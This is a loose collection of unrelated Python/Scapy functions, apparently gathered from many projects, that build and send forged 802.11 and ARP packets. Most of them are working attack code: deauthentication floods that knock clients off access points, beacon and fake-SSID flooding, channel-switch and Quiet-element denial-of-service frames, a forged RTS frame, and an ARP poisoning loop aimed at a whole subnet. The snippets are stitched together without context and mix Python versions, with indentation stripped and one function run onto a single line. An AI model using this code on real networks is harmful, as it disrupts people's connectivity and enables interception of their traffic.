def channelSwitchAttack(config):
frame = ""
frameType = "beacon" #choose betweeen action_frame or beacon.
#enable monitor mode and set the channel.
setMonitorMode(config["iface"])
setChannel(str(config["iface"]), config["channel"])
timeToRun = (time.time() + config["time"])
print("Sending channelSwitchBeacon to " + str(config["mac"]) + " from: " + config["bssid"] + " on channel: " + str(config["channel"]))
if(frameType == "action_frame"):
dot11 = Dot11(type=0, subtype=13, addr1=config["mac"], addr2=config["bssid"], addr3=config["bssid"])
category = ('\x00' # spectrum management
'\x04') #channel switch announcement
csa = Dot11Elt(ID='Channel Switch', info=(
'\x00' #Channel switch mode
'\x04' #new channel ))
'\x00')) #channel switch cnt
frame = RadioTap()/dot11/category/csa
elif(frameType == "beacon"):
dot11 = Dot11(type=0, subtype=8, addr1=config["mac"], addr2=config["bssid"], addr3=config["bssid"])
beacon = Dot11Beacon(cap='ESS+privacy')
essid = Dot11Elt(ID='SSID',info=config["ssid"], len=len(config["ssid"]))
csa = Dot11Elt(ID='Channel Switch', info=(
'\x00' #Channel switch mode
'\x64' #new channel ))
'\x00')) #channel switch cnt
frame = RadioTap()/dot11/beacon/essid/csa
printTime()
while(time.time() < timeToRun):
#frame.show()
sendp(frame, iface=config["iface"], loop=0, verbose=0)
time.sleep(config["interval"])
printTime()
def send(bssid, client, count):
pckt_to_ap = RadioTap() / Dot11(addr1=client, addr2=bssid,
addr3=bssid) / Dot11Deauth()
pckt_to_client = None
if client != 'FF:FF:FF:FF:FF:FF':
pckt_to_client = RadioTap() / Dot11(
addr1=bssid, addr2=client, addr3=bssid) / Dot11Deauth()
print('Sending Deauth to ' + client + ' from ' + bssid)
if not count:
print('Press CTRL+C to quit')
# We will do like aireplay does and send the packets in bursts of 64, then sleep for half a sec or so
while count != 0:
try:
for i in range(64):
sendp(pckt_to_ap,
verbose=0) # Send deauthentication frame to the AP
if pckt_to_client:
sendp(pckt_to_client
) # Send deauthentication frame to the Client
os.write(1, b".") # show sending status
count -= 1 # If count was -1, this will be an infinite loop
os.write(1, b"\r") # clear one line
time.sleep(.5)
except KeyboardInterrupt:
break
def deauthAttack(config):
#enable monitor mode and set the channel.
setMonitorMode(config["iface"])
setChannel(str(config["iface"]), config["channel"])
timeToRun = (time.time() + config["time"])
packetToClient = RadioTap()/Dot11(type=0,subtype=12,addr1=config["mac"],addr2=config["bssid"],addr3=config["bssid"])/Dot11Deauth(reason=7)
packetToAP = RadioTap()/Dot11(type=0,subtype=12,addr1=config["bssid"],addr2=config["mac"],addr3=config["mac"])/Dot11Deauth(reason=7)
print("DA:" + str(config["mac"]) + " SA: " + str(config["bssid"]) + " BSSID: " + str(config["bssid"]))
printTime()
b = 1
while(time.time() < timeToRun):
if (config["amount"]):
for i in range(int(config["amount"])):
sendp(packetToAP, iface=config["iface"], loop=0, verbose=0)
sendp(packetToClient, iface=config["iface"], loop=0, verbose=0)
sleep(config["interval"])
else:
print(str(b) + " frame(s) send.. ")
printTime()
sendp(packetToAP, iface=config["iface"], loop=0, verbose=0)
sendp(packetToClient, iface=config["iface"], loop=0, verbose=0)
time.sleep(config["interval"])
b+=1
printTime()
def stormWithBeaconFrames():
global interfaceName
global monitorInterface
log("Starting with storming on interface [{}]".format(interfaceName))
netSSID = 'testSSID' #Network name here
iface = 'wlan0mon' #Interface name here
dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2=str(RandMAC()), addr3=str(RandMAC()))
beacon = Dot11Beacon(cap='ESS+privacy')
essid = Dot11Elt(ID='SSID',info=netSSID, len=len(netSSID))
rsn = Dot11Elt(ID='RSNinfo', info=(
'\x01\x00' #RSN Version 1
'\x00\x0f\xac\x02' #Group Cipher Suite : 00-0f-ac TKIP
'\x02\x00' #2 Pairwise Cipher Suites (next two lines)
'\x00\x0f\xac\x04' #AES Cipher
'\x00\x0f\xac\x02' #TKIP Cipher
'\x01\x00' #1 Authentication Key Managment Suite (line below)
'\x00\x0f\xac\x02' #Pre-Shared Key
'\x00\x00')) #RSN Capabilities (no extra capabilities)
frame = RadioTap()/dot11/beacon/essid/rsn
frame.show()
print("\nHexdump of frame:")
hexdump(frame)
raw_input("\nPress enter to start\n")
sendp(frame, iface=iface, inter=0.100, loop=1)
def test():
netSSID = 'testSSID' #Network name here
iface = 'mon5' #Interface name here
dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff',
addr2='22:22:22:22:22:22', addr3='33:33:33:33:33:33')
beacon = Dot11Beacon(cap='ESS+privacy')
essid = Dot11Elt(ID='SSID',info=netSSID, len=len(netSSID))
rsn = Dot11Elt(ID='RSNinfo', info=(
'\x01\x00' #RSN Version 1
'\x00\x0f\xac\x02' #Group Cipher Suite : 00-0f-ac TKIP
'\x02\x00' #2 Pairwise Cipher Suites (next two lines)
'\x00\x0f\xac\x04' #AES Cipher
'\x00\x0f\xac\x02' #TKIP Cipher
'\x01\x00' #1 Authentication Key Managment Suite (line below)
'\x00\x0f\xac\x02' #Pre-Shared Key
'\x00\x00')) #RSN Capabilities (no extra capabilities)
frame = RadioTap()/dot11/beacon/essid/rsn
frame.show()
print("\nHexDump of frame:")
hexdump(frame)
raw_input("\nPress enter to start\n")
sendp(frame, iface=iface, inter=0.100, loop=1)
def create_beacon(name, password_protected=False):
dot11 = Dot11(type=0,
subtype=8,
addr1='ff:ff:ff:ff:ff:ff',
addr2=str(RandMAC()),
addr3=str(RandMAC()))
beacon = Dot11Beacon(
cap='ESS+privacy' if password_protected else 'ESS')
essid = Dot11Elt(ID='SSID', info=name, len=len(name))
if not password_protected:
return RadioTap() / dot11 / beacon / essid
rsn = Dot11Elt(ID='RSNinfo',
info=('\x01\x00'
'\x00\x0f\xac\x02'
'\x02\x00'
'\x00\x0f\xac\x04'
'\x00\x0f\xac\x02'
'\x01\x00'
'\x00\x0f\xac\x02'
'\x00\x00'))
return RadioTap() / dot11 / beacon / essid / rsn
def interpret_targets(self, ap_targets, client_targets):
if not self._targeted_only:
for access_point in ap_targets:
deauth_packet = RadioTap() / \
Dot11(type=0,subtype=12, addr1="FF:FF:FF:FF:FF:FF", \
addr2=access_point.bssid, \
addr3=access_point.bssid) / \
Dot11Deauth(reason=7)
self.packets.add(deauth_packet)
for client in client_targets:
mac = client.client_mac
bssid = client.associated_bssid
if bssid == None:
continue
deauth_packet1 = RadioTap() / \
Dot11(type=0,subtype=12, addr1=bssid, addr2=mac, addr3=mac) / \
Dot11Deauth(reason=7)
deauth_packet2 = RadioTap() / \
Dot11(type=0,subtype=12, addr1=mac, addr2=bssid, addr3=bssid) / \
Dot11Deauth(reason=7)
self.packets.add(deauth_packet1)
self.packets.add(deauth_packet2)
def __init__(
self,
config: dict,
boot_time: datetime.datetime,
lock: Lock,
sequence_number: Value,
queue: Queue,
):
self.log = logging.getLogger(inspect.stack()[0][1].split("/")[-1])
self.log.debug("sniffer %s; parent pid: %s", os.getpid(), os.getppid())
self.queue = queue
self.boot_time = boot_time
self.config = config
self.sequence_number = sequence_number
self.ssid = config.get("GENERAL").get("ssid")
self.interface = config.get("GENERAL").get("interface")
self.channel = int(config.get("GENERAL").get("channel"))
self.assoc_reqs = {}
self.bpf_filter = "type mgt subtype probe-req or type mgt subtype auth or type mgt subtype assoc-req or type mgt subtype reassoc-req"
# mgt bpf filter: assoc-req, assoc-resp, reassoc-req, reassoc-resp, probe-req, probe-resp, beacon, atim, disassoc, auth, deauth
# ctl bpf filter: ps-poll, rts, cts, ack, cf-end, cf-end-ack
scapyconf.iface = self.interface
self.l2socket = scapyconf.L2socket(iface=self.interface)
self.log.debug(self.l2socket.outs)
self.received_frame_cb = self.received_frame
self.dot11_probe_request_cb = self.probe_response
self.dot11_assoc_request_cb = self.assoc_req
self.dot11_auth_cb = self.auth
with lock:
probe_resp_ies = build_fake_frame_ies(self.config)
self.mac = get_mac(self.interface)
self.probe_response_frame = (
RadioTap()
/ Dot11(
subtype=DOT11_SUBTYPE_PROBE_RESP, addr2=self.mac, addr3=self.mac
)
/ Dot11ProbeResp(cap=0x1111)
/ probe_resp_ies
)
self.auth_frame = (
RadioTap()
/ Dot11(subtype=DOT11_SUBTYPE_AUTH_REQ, addr2=self.mac, addr3=self.mac)
/ Dot11Auth(seqnum=0x02)
)
sniff(
iface=self.interface,
prn=self.received_frame_cb,
store=0,
filter=self.bpf_filter,
)
def geracao_pacotes(self):
netSSID = 'testSSID'
iface = 'wlp3s0mon' #Nome da Interface Wireless
mac_forjado_pr = self.criacao_mac_ponto_referencia()
numero_pacotes = int(self.numero_pacotes.get())
intervalo_envio = float(self.intervalo.get())
## addr1 = MAC de destino (MAC da placa wireless)
## addr2 = Endereco MAC de origem do remetente. (MAC forjado)
## addr3 = Endereco MAC do ponto de acesso.
dot11 = Dot11(type=0,
subtype=8,
addr1='E4:18:6B:4B:94:00',
addr2=mac_forjado_pr,
addr3='33:33:33:33:33:33')
beacon = Dot11Beacon(
cap='ESS+privacy') ## indica a capacidade do ponto de acesso
essid = Dot11Elt(ID='SSID', info=netSSID, len=len(netSSID))
rsn = Dot11Elt(ID='RSNinfo',
info=('\x01\x00'
'\x00\x0f\xac\x02'
'\x02\x00'
'\x00\x0f\xac\x04'
'\x00\x0f\xac\x02'
'\x01\x00'
'\x00\x0f\xac\x02'
'\x00\x00'))
frame = RadioTap() / dot11 / beacon / essid / rsn
frame.show()
print("HexDump of frame")
hexdump(frame)
a = sendp(frame / "RURALRURALRURAL",
iface=iface,
inter=intervalo_envio,
loop=0,
count=numero_pacotes
) # inter = intervalo entre o envio dos pacotes
print(a)
self.atualizar_tela()
def deauthentication_attack(self):
# Based on:
# https://raidersec.blogspot.pt/2013/01/wireless-deauth-attack-using-aireplay.html
packets = []
if not self._targeted_only:
for DeauthAP in self.aps_to_deauth:
deauth_packet = RadioTap() / \
Dot11(type=0,subtype=12, addr1="FF:FF:FF:FF:FF:FF", addr2=DeauthAP.bssid, addr3=DeauthAP.bssid) / \
Dot11Deauth(reason=7)
packets.append(deauth_packet)
for client in self.clients_to_deauth:
mac = client.client_mac
bssid = client.bssid
deauth_packet1 = RadioTap() / \
Dot11(type=0,subtype=12, addr1=bssid, addr2=mac, addr3=mac) / \
Dot11Deauth(reason=7)
deauth_packet2 = RadioTap() / \
Dot11(type=0,subtype=12, addr1=mac, addr2=bssid, addr3=bssid) / \
Dot11Deauth(reason=7)
packets.append(deauth_packet1)
packets.append(deauth_packet2)
count = self._burst_count if self._burst_count > 0 else 5
print dedent("[+] Starting deauthentication attack \n\
- {nburst} bursts of 20 packets \n\
- {npackets} different packets").format( nburst=self._burst_count,
npackets=len(packets))
try:
while count >= 0 and self.deauth_running:
for packet in packets:
sendp(packet, iface = self.running_interface, count = 2, inter = 0.1, verbose=0)
count -= 1
except socket_error as e:
if not e.errno == 100:
print e
traceback.print_exc()
except Exception as e:
print "Exception: {}".format(e)
print "[-] Stopping deauthentication attack."
self.deauth_running = False
self._restore_deauthor_state()
print "[+] Deauthentication attack finished executing."
def craft_deauth_packets(self, client_mac, ap_bssid): # Craft Deauthentication packets with multiple reason codes deauthentication_packets = [] for reason_code in range(6, 20): deauth_packet1 = RadioTap() / \ Dot11(type=0,subtype=12, addr1=ap_bssid, addr2=client_mac, addr3=client_mac) / \ Dot11Deauth(reason=reason_code) deauth_packet2 = RadioTap() / \ Dot11(type=0,subtype=12, addr1=client_mac, addr2=ap_bssid, addr3=ap_bssid) / \ Dot11Deauth(reason=reason_code) deauthentication_packets.append(deauth_packet1) deauthentication_packets.append(deauth_packet2) return deauthentication_packets
def createAccessPoint(interface, ssid):
dot11 = Dot11(type=0,
subtype=8,
addr1='ff:ff:ff:ff:ff:ff',
addr2='22:22:22:22:22:22',
addr3='33:33:33:33:33:33')
beacon = Dot11Beacon(cap='ESS+privacy')
essid = Dot11Elt(ID='SSID', info=ssid, len=len(ssid))
rsn = Dot11Elt(ID='RSNinfo',
info=('\x01\x00'
'\x00\x0f\xac\x02'
'\x02\x00'
'\x00\x0f\xac\x04'
'\x00\x0f\xac\x02'
'\x01\x00'
'\x00\x0f\xac\x02'
'\x00\x00'))
frame = RadioTap() / dot11 / beacon / essid / rsn
log.info("Beacon Frame created with SSID: '" + ssid + "'")
log.info("Transmitting Beacon through interface '" + interface + "'")
raw_input("\nPress Enter to start Access Point '" + ssid + "'\n")
log.success("Access Point Created!")
sendp(frame, iface=interface, inter=0.10, loop=1)
def main():
ssids = sys.argv[2:] #Network name here
iface = sys.argv[1] #Interface name here
frames = []
for netSSID in ssids:
print netSSID
dot11 = Dot11(type=0,
subtype=8,
addr1='ff:ff:ff:ff:ff:ff',
addr2=str(RandMAC()),
addr3=str(RandMAC()))
beacon = Dot11Beacon(cap='ESS+privacy')
essid = Dot11Elt(ID='SSID', info=netSSID, len=len(netSSID))
rsn = Dot11Elt(
ID='RSNinfo',
info=(
'\x01\x00' #RSN Version 1
'\x00\x0f\xac\x02' #Group Cipher Suite : 00-0f-ac TKIP
'\x02\x00' #2 Pairwise Cipher Suites (next two lines)
'\x00\x0f\xac\x04' #AES Cipher
'\x00\x0f\xac\x02' #TKIP Cipher
'\x01\x00' #1 Authentication Key Managment Suite (line below)
'\x00\x0f\xac\x02' #Pre-Shared Key
'\x00\x00')) #RSN Capabilities (no extra capabilities)
frame = RadioTap() / dot11 / beacon / essid / rsn
print "SSID=%-20s %r" % (netSSID, frame)
frames.append(frame)
sendp(frames, iface=iface, inter=0.0100 if len(frames) < 10 else 0, loop=1)
def ssidSpawner(config):
#enable monitor mode and set the channel.
setMonitorMode(config["iface"])
setChannel(str(config["iface"]), config["channel"])
frames = []
while True:
#for netSSID in ssids:
netSSID = id_generator()
print(netSSID)
dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff',addr2=str(RandMAC()), addr3=str(RandMAC()))
beacon = Dot11Beacon(cap='ESS+privacy')
essid = Dot11Elt(ID='SSID',info=netSSID, len=len(netSSID))
rsn = Dot11Elt(ID='RSNinfo', info=(
'\x01' #RSN Version 1
'\x00\x0f\xac\x02' #Group Cipher Suite : 00-0f-ac TKIP
'\x02\x00' #2 Pairwise Cipher Suites (next two lines)
'\x00\x0f\xac\x04' #AES Cipher
'\x00\x0f\xac\x02' #TKIP Cipher
'\x01\x00' #1 Authentication Key Managment Suite (line below)
'\x00\x0f\xac\x02' #Pre-Shared Key
'\x00\x00')) #RSN Capabilities (no extra capabilities)
frame = RadioTap()/dot11/beacon/essid/rsn
print("SSID=%-20s %r"%(netSSID,frame))
frames.append(frame)
sendp(frames, iface=iface, inter=0.0100 if len(frames)<10 else 0, loop=1)
def deauth(self,
wireless_interface: str = 'wlan0',
bssid: str = '01:23:45:67:89:0a',
client: str = '01:23:45:67:89:0b',
delay: int = 5,
number_of_deauth_packets: int = 5) -> None:
"""
Sending 802.11 deauth packets
:param wireless_interface: A wireless interface name for sending deauth packets (default: 'wlan0')
:param bssid: BSSID (example: '01:23:45:67:89:0a')
:param client: A client MAC address for deauth (example: '01:23:45:67:89:0b')
:param delay: A delay between sending deauth packets (default: 5)
:param number_of_deauth_packets: The number of deauth packets for one iteration (default: 5)
:return: None
"""
deauth_packet: bytes = RadioTap() / \
Dot11(type=0, subtype=12, addr1=client.lower(),
addr2=bssid.lower(), addr3=bssid.lower()) / \
Dot11Deauth(reason=7)
sleep(delay)
while True:
sendp(deauth_packet,
iface=wireless_interface,
count=number_of_deauth_packets,
verbose=False)
self.print_info('Send ', str(number_of_deauth_packets),
' deauth packets to: ', client, ' from: ', bssid)
sleep(delay)
def encapsulate(payload, addr_from, addr_to=BroadcastAddress):
from scapy.all import Dot11, Dot11Beacon, Dot11Elt, RadioTap
radio = RadioTap()
dot11 = Dot11(type=0,
subtype=8,
addr1=addr_to,
addr2=SignatureAddress,
addr3=addr_from)
beacon = Dot11Beacon(cap='ESS')
frame = radio / dot11 / beacon
data_size = len(payload)
data_left = data_size
data_off = 0
chunk_size = 255
while data_left > 0:
sz = min(chunk_size, data_left)
chunk = payload[data_off:data_off + sz]
frame /= Dot11Elt(ID=Dot11ElemID_Identity, info=chunk, len=sz)
data_off += sz
data_left -= sz
return frame
def quietAttack(config):
#enable monitor mode and set the channel.
setMonitorMode(config["iface"])
setChannel(str(config["iface"]), config["channel"])
timeToRun = (time.time() + config["time"])
dot11 = Dot11(type=0, subtype=8, addr1=config["mac"], addr2=config["bssid"], addr3=config["bssid"])
beacon = Dot11Beacon(cap='ESS+privacy')
essid = Dot11Elt(ID='SSID',info=config["ssid"], len=len(config["ssid"]))
rsn = Dot11Elt(ID='RSNinfo', info=(
'\x01' #RSN Version 1
'\x00\x0f\xac\x02' #Group Cipher Suite : 00-0f-ac TKIP
'\x02\x00' #2 Pairwise Cipher Suites (next two lines)
'\x00\x0f\xac\x04' #AES Cipher
'\x00\x0f\xac\x02' #TKIP Cipher
'\x01\x00' #1 Authentication Key Managment Suite (line below)
'\x00\x0f\xac\x02' #Pre-Shared Key
'\x01\x00')) #RSN Capabilities (no extra capabilities)
quiet = Dot11Elt(ID='Quiet', info=(
'\x00' #Quiet count | remaining beacon intervals before quiet interval starts (0 for direct)
'\x00' #Quiet period | #0 indicates no quiet periods are scheduled. A non-zero value indicates the number of beacon intervals between each period.
'\x00\x10' #Quiet duration | length of quiet period in time units (TU).
'\x00\x00')) #Quiet offset | possiblity to specify other start time than right after beacon in TU, But has to be shorther than beacon interval.
frame = RadioTap()/dot11/beacon/essid/quiet
printTime()
while(time.time() < timeToRun):
sendp(frame, iface=config["iface"], loop=0, verbose=0)
time.sleep(config["interval"])
printTime()
def main():
if len(sys.argv) < 3:
print("usage: %s <interface> <words of name>" % sys.argv[0])
sys.exit(1)
iface = sys.argv[1]
name = ' '.join(sys.argv[2:])
frames = []
for suffix in ap_slander:
ssid = name + ' ' + suffix.upper()
print(ssid)
dot11 = Dot11(type=0,
subtype=8,
addr1='ff:ff:ff:ff:ff:ff',
addr2=str(RandMAC()),
addr3=str(RandMAC()))
beacon = Dot11Beacon(cap='ESS+privacy')
essid = Dot11Elt(ID='SSID', info=ssid, len=len(ssid))
rsn = Dot11Elt(
ID='RSNinfo',
info=(
'\x01\x00' #RSN Version 1
'\x00\x0f\xac\x02' #Group Cipher Suite : 00-0f-ac TKIP
'\x02\x00' #2 Pairwise Cipher Suites (next two lines)
'\x00\x0f\xac\x04' #AES Cipher
'\x00\x0f\xac\x02' #TKIP Cipher
'\x01\x00' #1 Authentication Key Managment Suite (line below)
'\x00\x0f\xac\x02' #Pre-Shared Key
'\x00\x00')) #RSN Capabilities (no extra capabilities)
frame = RadioTap() / dot11 / beacon / essid / rsn
#print("SSID=%-20s %r"%(ssid,frame))
frames.append(frame)
sendp(frames, iface=iface, inter=0.0100 if len(frames) < 10 else 0, loop=1)
def geracao_pacotes():
nome_ponto_referencia = input('Insira o nome do Ponto de Referência: ')
mac_forjado_pr = criacao_mac_ponto_referencia(nome_ponto_referencia)
tempo_execucao = float(input("Insira o tempo de execucao (minutos): "))
print('\n_________________________________________')
intervalo_envio = float(
input(
"Insira o intervalo de frequencia de envio de pacotes (em segundos) : "
))
print('\n_________________________________________')
num_pacotes = (tempo_execucao * 60) / intervalo_envio
data = "UFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJ"
## addr1 = MAC de destino (MAC da placa wireless)
## addr2 = Endereco MAC de origem do remetente. (MAC forjado)
## addr3 = Endereco MAC do ponto de acesso.
dot11 = Dot11(type=2,
subtype=0,
addr1='E4:18:6B:4B:94:00',
addr2=mac_forjado_pr,
addr3='33:33:33:33:33:33')
essid = Dot11Elt(
ID='SSID', info='testSSID',
len=len('testSSID')) # indica a capacidade do ponto de acesso
frame = RadioTap() / dot11 / essid / data
frame.show()
input("Digite enter para o inicio do envio de pacotes:")
sendp(
frame,
iface='wlp3s0mon',
inter=intervalo_envio,
loop=0,
count=num_pacotes
) # iface = Nome da Interface Wireless. inter = intervalo entre o envio dos pacotes (em segundos). count = numero de pacotes
escreve_arquivo(nome_ponto_referencia, mac_forjado_pr)
def __send_poison(self):
print "[*] Scanning for alive hosts.."
target = self.__get_targets(str(self.gateway + "/24"))
print "Done!"
print "[*] Starting to poison.."
print ""
if self.log:
with open("/var/log/fun&games.log", "a") as f:
f.write("Poisoning the ARP cache " + str(datetime.now()) +
"\n")
while True:
try:
for i in range(
len(target)
): # if you have no idea whats going on below, read the scapy docs
if self.wireless == False:
poison_target = Ether() / ARP(op=2,
psrc=self.gateway,
pdst=target[i][0],
hwdst=target[i][1])
poison_router = Ether() / ARP(op=2,
psrc=target[i][0],
pdst=self.gateway,
hwdst=self.router_mac)
sendp(poison_target)
sendp(poison_router)
else:
poison_target = RadioTap() / ARP(op=2,
psrc=self.gateway,
pdst=target[i][0],
hwdst=target[i][1])
poison_router = RadioTap() / ARP(op=2,
psrc=target[i][0],
pdst=self.gateway,
hwdst=self.router_mac)
sendp(poison_target, iface=self.iface)
sendp(poison_router, iface=self.iface)
time.sleep(1)
except:
if self.log:
with open("/var/log/fun&games.log", "a") as f:
f.write("ARP poisoning failed " + str(datetime.now()) +
"\n")
sys.exit(
"A major fuckup, can't spam my favorite ARP requests..")
def deauth(iface: str, count: int, bssid: str, target_mac: str):
"""
- addr1=target_mac specifies that this packet will go to the victim's computer
- addr2=bssid specifies the MAC address of the AP
- addr3=bssid is the same as addr2
"""
dot11 = Dot11(addr1=target_mac, addr2=bssid, addr3=bssid)
frame = RadioTap()/dot11/Dot11Deauth()
sendp(frame, iface=iface, count=count, inter=0.100)
def sendAssocReq():
#packet to client
dot11 = Dot11(type=0, subtype=0, addr1=config["bssid"], addr2=config["mac"], addr3=config["mac"])
auth = Dot11AssoReq(ID=ESS, info='\x01')#ESS=0x0, privacy=0x1)
essid = Dot11Elt(ID='SSID',info="wips-test-psk", len=len("wips-test-psk"))
#rsn omzetten naar Dot11EltRSN
rsn = Dot11Elt(ID='RSNinfo', info=(
'\x01' #RSN Version 1
'\x00\x0f\xac\x02' #Group Cipher Suite : 00-0f-ac TKIP
'\x02\x00' #2 Pairwise Cipher Suites (next two lines)
'\x00\x0f\xac\x04' #AES Cipher
'\x00\x0f\xac\x02' #TKIP Cipher
'\x01\x00' #1 Authentication Key Managment Suite (line below)
'\x00\x0f\xac\x02' #Pre-Shared Key
'\x00\x00')) #RSN Capabilities (no extra capabilities)
frame = RadioTap()/dot11/auth/essid#/rsn
frame.show()
sendp(frame, iface=config["iface"], inter=0.100, loop=0)
def deauth(self, iface: NetworkInterface, count = 1):
d11 = RadioTap() / Dot11(
addr1 = 'ff:ff:ff:ff:ff:ff',
addr2 = self.bssid, addr3 = self.bssid
)
pkt = d11 / Dot11Deauth(reason = 3)
iface.set_channel(self.channel)
iface.send(pkt, verbose = False, inter = 0.75, count = count)
def _send_802_11_frame(self, ssid):
dot11 = Dot11(type=0,subtype=8,addr1="ff:ff:ff:ff:ff:ff",
addr2=self.ap.ip,addr3=self.ap.ip)
beacon = Dot11Beacon()
essid = Dot11Elt(ID='SSID',info=ssid,len=len(ssid))
radiotap = RadioTap(len=18, present='Flags+Rate+Channel+dBm_AntSignal+Antenna',
notdecoded='\x00\x6c' +
get_frequency(self.ap.ch) +
'\xc0\x00\xc0\x01\x00\x00')
frame = radiotap/dot11/beacon/essid
sendp(frame, iface=self.ap.iface, verbose=False)
def build(name):
dot11_header = Dot11(type=0,
subtype=8,
addr1=dest,
addr2=source,
addr3=source)
beacon = Dot11Beacon(cap=0x1111)
data = (
beacon / Dot11Elt(ID="SSID", info=ssid(name)) /
Dot11Elt(ID="Rates", info=bytes([140, 18, 152, 36, 176, 72, 96, 108])))
return RadioTap() / dot11_header / data
def send_beacon(mac, ssid, verbose = False):
dot11 = Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=mac, addr3=mac, type=0, subtype=8)
beacon = Dot11Beacon(cap="ESS+privacy")
essid = Dot11Elt(ID="SSID", info=ssid, len=len(ssid))
frame = RadioTap() / dot11 / beacon / essid
if verbose:
print(f"Sending beacon: {ssid}")
sendp(frame, inter=0.1, loop=1, iface=interface, verbose=0)
def forgedRTS():
millis = 615
blob = struct.pack("<H", millis)
millis = struct.unpack(">H", blob)[0]
dot11 = Dot11(addr1=TARGET_STATION,
addr2=SRC_ADDR,
type=CONTROL,
subtype=RTS_SUBTYPE,
ID=millis)
return RadioTap() / dot11
def __beacon_send(self, ssid, inter, enc):
addr2 = gu.rand_mac()
addr3 = gu.rand_mac()
dot11 = Dot11(type=0,
subtype=8,
addr1='ff:ff:ff:ff:ff:ff',
addr2=addr2,
addr3=addr3)
beacon = Dot11Beacon(cap='ESS')
beacon_enc = Dot11Beacon(cap='ESS+privacy')
essid = Dot11Elt(ID='SSID', info=ssid, len=len(ssid))
rsn = Dot11Elt(
ID='RSNinfo',
info=
('\x01\x00\x00\x0f\xac\x02\x02\x00\x00\x0f\xac\x04\x00\x0f\xac\x02\x01\x00\x00\x0f\xac\x02\x00\x00'
))
if enc:
frame = RadioTap() / dot11 / beacon_enc / essid / rsn
else:
frame = RadioTap() / dot11 / beacon / essid
sendp(frame, iface=self.iface, inter=inter, loop=1)
def interpret_targets(self, ap_targets, client_targets):
"""
A broadcast Deauth packet is created for every access point in the list.
A directed Deauth packet is created for every client in the list.
"""
# Packet creation based on:
# https://raidersec.blogspot.pt/2013/01/wireless-deauth-attack-using-aireplay.html
if not self._targeted_only:
for access_point in ap_targets:
deauth_packet = RadioTap() / \
Dot11(type=0, subtype=12, addr1="FF:FF:FF:FF:FF:FF",
addr2=access_point.bssid,
addr3=access_point.bssid) / \
Dot11Deauth(reason=7)
self.packets.add(deauth_packet)
SessionManager().log_event(NeutralEvent("Added AP with BSSID '{}' as deauthentication target."
.format(access_point.bssid)))
for client in client_targets:
mac = client.client_mac
bssid = client.associated_bssid
if bssid is None:
continue
deauth_packet1 = RadioTap() / \
Dot11(type=0, subtype=12, addr1=bssid, addr2=mac, addr3=mac) / \
Dot11Deauth(reason=7)
deauth_packet2 = RadioTap() / \
Dot11(type=0, subtype=12, addr1=mac, addr2=bssid, addr3=bssid) / \
Dot11Deauth(reason=7)
self.packets.add(deauth_packet1)
self.packets.add(deauth_packet2)
SessionManager().log_event(NeutralEvent("Added Client with MAC '{}' as deauthentication target."
.format(mac)))
def radiotap(self):
present = ''
data = ''
if self._tap.rate is not None:
if present == '':
present = 'Rate'
else:
present += '+Rate'
data += struct.pack('<B', ((self._tap.rate) * 10) / 5)
if self._tap.power is not None:
if present == '':
present = 'dBm_TX_Power'
else:
present += '+dBm_TX_Power'
data += struct.pack('<b', self._tap.power)
if self._tap.tx_flags is not None:
pass
if self._tap.retries is not None:
if present == '':
present = 'b17'
else:
present += '+b17'
data += struct.pack('<B', self._tap.retries)
if self._tap.mcs is not None:
pass
if present == '':
rt = RadioTap()
else:
rt = RadioTap(present=present, notdecoded=data)
return rt
